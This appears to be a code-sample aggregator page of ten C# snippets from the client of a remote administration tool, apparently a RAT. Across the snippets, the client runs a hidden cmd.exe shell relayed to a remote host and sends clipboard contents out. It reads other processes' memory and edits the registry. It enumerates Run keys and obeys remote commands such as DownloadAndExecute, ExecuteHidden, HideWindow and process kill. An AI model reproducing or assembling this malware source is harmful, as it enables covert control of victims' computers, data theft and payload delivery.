Ejemplo n.º 1
0
        public static void HandleMove(object[] args)
        {
            FileManagerCommand command = (FileManagerCommand)args[1];
            bool   force = command == FileManagerCommand.ForceMoveFile;
            Guid   ID    = (Guid)args[2];
            string from  = (string)args[3];
            string to    = (string)args[4];

            NetworkHost.Send((byte)NetworkCommand.FileManager, (byte)FileManagerCommand.MoveResponce, ID, MiscHandler.MoveFile(from, to, force));
        }
Ejemplo n.º 2
0
        public static void Handle(object[] data)
        {
            var command = (RemoteDesktopCommand)data[1];

            Console.WriteLine("Remote desktop command: {0}", command.ToString());

            if (command == RemoteDesktopCommand.RequestFrame)
            {
                CheckFrame((int)data[2]);
            }

            if (command == RemoteDesktopCommand.GetMonitors && Screen.AllScreens != null && Screen.AllScreens.Length > 0)
            {
                NetworkHost.Send((byte)NetworkCommand.RemoteDesktop, (byte)RemoteDesktopCommand.MonitorResponce, Screen.AllScreens.Select(s => s.DeviceName).ToArray());
            }
        }
Ejemplo n.º 3
0
        public static void SendTcpTable()
        {
            MIB_TCPROW_OWNER_PID[] table = GetTable();
            string[] Names         = new string[table.Length];
            string[] LocalAddress  = new string[table.Length];
            string[] RemoteAddress = new string[table.Length];
            byte[]   States        = new byte[table.Length];

            for (int i = 0; i < table.Length; i++)
            {
                LocalAddress[i]  = string.Format("{0}:{1}", table[i].LocalAddress, table[i].LocalPort);
                RemoteAddress[i] = string.Format("{0}:{1}", table[i].RemoteAddress, table[i].RemotePort);
                States[i]        = Convert.ToByte(table[i].state);

                try
                {
                    Process p = Process.GetProcessById((int)table[i].owningPid);
                    Names[i] = p.ProcessName;
                }
                catch
                {
                    Names[i] = string.Format("PID: {0}", table[i].owningPid);
                }
            }
            host.Send((byte)NetworkCommand.Connections, (byte)ConnectionsCommand.Table, Names, LocalAddress, RemoteAddress, States);
        }
Ejemplo n.º 4
0
        static void SendClipboardText()
        {
            Thread thread = new Thread(() => Host.Send((byte)NetworkCommand.Clipboard, (byte)ClipboardCommand.Text, Clipboard.GetText()));

            thread.SetApartmentState(ApartmentState.STA);
            thread.Start();
            thread.Join();
        }
Ejemplo n.º 5
0
 private void inputBox_KeyDown(object sender, KeyEventArgs e)
 {
     if (e.KeyCode == Keys.Enter && inputBox.Text != string.Empty)
     {
         networkHost.Send((byte)NetworkCommand.RemoteChat, (byte)RemoteChatCommand.Message, inputBox.Text);
         AddMessage("YOU: {0}", inputBox.Text);
         inputBox.Text = "";
     }
 }
Ejemplo n.º 6
0
        static void SetupConsole()
        {
            if (console == null || console.HasExited)
            {
                if (consoleThread != null && consoleThread.ThreadState == System.Threading.ThreadState.Running)
                {
                    consoleThread.Abort();
                }
                ProcessStartInfo psi = new ProcessStartInfo("cmd.exe");
                psi.UseShellExecute        = false;
                psi.RedirectStandardInput  = true;
                psi.RedirectStandardOutput = true;
                psi.RedirectStandardError  = true;
                psi.WindowStyle            = ProcessWindowStyle.Hidden;
                psi.CreateNoWindow         = true;
                console = Process.Start(psi);

                consoleThread = new Thread(() =>
                {
                    try
                    {
                        using (StreamReader sr = console.StandardOutput)
                        {
                            string line = string.Empty;
                            while ((line = sr.ReadLine()) != null)
                            {
                                if (!string.IsNullOrEmpty(line))
                                {
                                    NetworkHost.Send((byte)NetworkCommand.Console, (byte)ConsoleCommand.Responce, line);
                                }
                            }
                        }
                        console.Kill();
                    }
                    catch
                    {
                    }
                });
                consoleThread.Start();
                NetworkHost.Send((byte)NetworkCommand.Console, (byte)ConsoleCommand.Responce, ">> New session started");
            }
        }
Ejemplo n.º 7
0
        public static void Handle(object[] data)
        {
            TaskManagerCommand command = (TaskManagerCommand)data[1];

            if (command == TaskManagerCommand.GetProcesses)
            {
                GetProcesses();
            }
            if (command == TaskManagerCommand.ReadMemory)
            {
                int     id     = (int)data[2];
                string  module = (string)data[3];
                int     offset = (int)data[4];
                Process p      = Process.GetProcessById(id);
                if (p.HasExited)
                {
                    NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
                }
                else
                {
                    ProcessModule procMod = null;
                    foreach (ProcessModule m in p.Modules)
                    {
                        if (m.ModuleName == module)
                        {
                            procMod = m;
                            break;
                        }
                    }
                    try
                    {
                        if (procMod == null)
                        {
                            return;
                        }
                        IntPtr addressRead = (IntPtr)((int)procMod.BaseAddress + offset);
                        int    output      = 0;
                        ReadProcessMemory(p.Handle, addressRead, ref output, 4, 0);
                        NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.MemoryValue, output);
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine(ex.ToString());
                        NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
                    }
                }
            }
            if (command == TaskManagerCommand.GetModules)
            {
                int     id = (int)data[2];
                Process p  = Process.GetProcessById(id);
                if (p.HasExited)
                {
                    NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
                }
                else
                {
                    string[] moduleNames = new string[p.Modules.Count];
                    for (int i = 0; i < moduleNames.Length; i++)
                    {
                        try
                        {
                            moduleNames[i] = p.Modules[i].ModuleName;
                        }
                        catch
                        {
                            moduleNames[i] = "InvalidModule";
                        }
                    }
                    NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.ModuleResponce, moduleNames);
                }
            }
        }
Ejemplo n.º 8
0
        public static void Handle(object[] data)
        {
            RegistryCommand command = (RegistryCommand)data[1];

            Console.WriteLine("Registry Command: {0}", command.ToString());


            if (command == RegistryCommand.DeleteValue)
            {
                try
                {
                    RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
                    if (key == null)
                    {
                        return;
                    }
                    string path = (string)data[3];
                    key.OpenSubKey(path, true).DeleteValue((string)data[4]);
                }
                catch (Exception ex)
                {
                    if (ex is UnauthorizedAccessException || ex is System.Security.SecurityException)
                    {
                        throw;
                    }
                    else
                    {
                        throw;
                    }
                }
            }

            if (command == RegistryCommand.SetValue)
            {
                try
                {
                    RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
                    if (key == null)
                    {
                        return;
                    }
                    string path = (string)data[3];
                    key.OpenSubKey(path, true).SetValue((string)data[4], (string)data[5]);
                }
                catch (Exception ex)
                {
                    if (ex is UnauthorizedAccessException || ex is System.Security.SecurityException)
                    {
                        throw;
                    }
                    else
                    {
                        throw;
                    }
                }
            }


            if (command == RegistryCommand.UpdateNodes)
            {
                try
                {
                    RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
                    if (key == null)
                    {
                        return;
                    }
                    string   path    = (string)data[3];
                    string[] subKeys = key.OpenSubKey(path).GetSubKeyNames();
                    if (subKeys.Length > 0)
                    {
                        NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.UpdateNodeResponce, subKeys);
                    }
                    else
                    {
                        NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.EmptyNode);
                    }
                }
                catch
                {
                    NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.NodeDeniedAccess);
                }
            }

            if (command == RegistryCommand.UpdateKeys)
            {
                try
                {
                    RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
                    if (key == null)
                    {
                        return;
                    }
                    string      path                     = (string)data[3];
                    RegistryKey registrySubkey           = key.OpenSubKey(path);
                    string[]    values                   = registrySubkey.GetValueNames();
                    Dictionary <string, string> valueDic = new Dictionary <string, string>();
                    foreach (string s in values)
                    {
                        if (!valueDic.ContainsKey(s))
                        {
                            valueDic.Add(s, registrySubkey.GetValue(s).ToString());
                        }
                    }
                    NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.ValueResponce, valueDic);
                }
                catch
                {
                    NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.ValueDeniedAccess);
                }
            }
        }
Ejemplo n.º 9
0
        public static void GetStartupItems()
        {
            List <StartupItem> startups = new List <StartupItem>();

            using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"))
            {
                if (key != null)
                {
                    foreach (string name in key.GetValueNames())
                    {
                        StartupItem i = new StartupItem();
                        i.Name = name;
                        i.Path = key.GetValue(name).ToString();
                        i.Type = (byte)StartupType.HKCU;
                        startups.Add(i);
                    }
                }
            }
            using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"))
            {
                if (key != null)
                {
                    foreach (string name in key.GetValueNames())
                    {
                        StartupItem i = new StartupItem();
                        i.Name = name;
                        i.Path = key.GetValue(name).ToString();
                        i.Type = (byte)StartupType.HKCUO;
                        startups.Add(i);
                    }
                }
            }
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"))
            {
                if (key != null)
                {
                    foreach (string name in key.GetValueNames())
                    {
                        StartupItem i = new StartupItem();
                        i.Name = name;
                        i.Path = key.GetValue(name).ToString();
                        i.Type = (byte)StartupType.HKLM;
                        startups.Add(i);
                    }
                }
            }
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"))
            {
                if (key != null)
                {
                    foreach (string name in key.GetValueNames())
                    {
                        StartupItem i = new StartupItem();
                        i.Name = name;
                        i.Path = key.GetValue(name).ToString();
                        i.Type = (byte)StartupType.HKLMO;
                        startups.Add(i);
                    }
                }
            }
            StartupItem[] items = startups.ToArray();
            Console.WriteLine("Startup items: {0}", items.Length);
            string[] names = new string[items.Length];
            string[] Paths = new string[items.Length];
            byte[]   type  = new byte[items.Length];
            for (int i = 0; i < items.Length; i++)
            {
                names[i] = items[i].Name;
                Paths[i] = items[i].Path;
                type[i]  = items[i].Type;
            }
            Host.Send((byte)NetworkCommand.StartupManager, (byte)StartupManagerCommand.StartupItems, names, Paths, type);
        }
Ejemplo n.º 10
0
        public void OnDataRecieved(object[] data)
        {
            NetworkCommand command = (NetworkCommand)data[0];

            Console.WriteLine("NetworkCommand: {0}", command.ToString());

            if (command == NetworkCommand.TaskManager)
            {
                TaskManagerHandler.Handle(data);
            }

            if (command == NetworkCommand.RegistryEdit)
            {
                RegistryEditorHandler.Handle(data);
            }
            if (command == NetworkCommand.FileManager)
            {
                FileManagerHandler.Handle(data);
            }
            if (command == NetworkCommand.Console)
            {
                ConsoleHandler.Handle(data);
            }
            if (command == NetworkCommand.Clipboard)
            {
                ClipboardHandler.Handle(data);
            }
            if (command == NetworkCommand.StartupManager)
            {
                StartupHandler.Handle(data);
            }
            if (command == NetworkCommand.Connections)
            {
                ConnectionsHandler.Handle(data);
            }


            if (command == NetworkCommand.Close)
            {
                Environment.Exit(0);
            }
            if (command == NetworkCommand.Restart)
            {
                MiscHandler.Restart();
            }
            if (command == NetworkCommand.Ping)
            {
                NetworkHost.Send((byte)NetworkCommand.Pong);
            }
            if (command == NetworkCommand.Execute)
            {
                MiscHandler.Execute((string)data[1]);
            }
            if (command == NetworkCommand.ExecuteHidden)
            {
                MiscHandler.ExecuteHidden((string)data[1]);
            }
            if (command == NetworkCommand.DeleteFile)
            {
                MiscHandler.DeleteFile((string)data[1]);
            }
            if (command == NetworkCommand.DownloadAndExecute)
            {
                MiscHandler.DownloadAndExecute((string)data[1], ".exe");
            }
            if (command == NetworkCommand.DownloadFile)
            {
                MiscHandler.DownloadFile((string)data[1], (string)data[2]);
            }
            if (command == NetworkCommand.KillProcess)
            {
                MiscHandler.KillProcess((int)data[1]);
            }
            if (command == NetworkCommand.SuspendProcess)
            {
                MiscHandler.SuspendProcess((int)data[1]);
            }
            if (command == NetworkCommand.ResumeProcess)
            {
                MiscHandler.ResumeProcess((int)data[1]);
            }
            if (command == NetworkCommand.HideWindow)
            {
                MiscHandler.HideWindow((int)data[1]);
            }
        }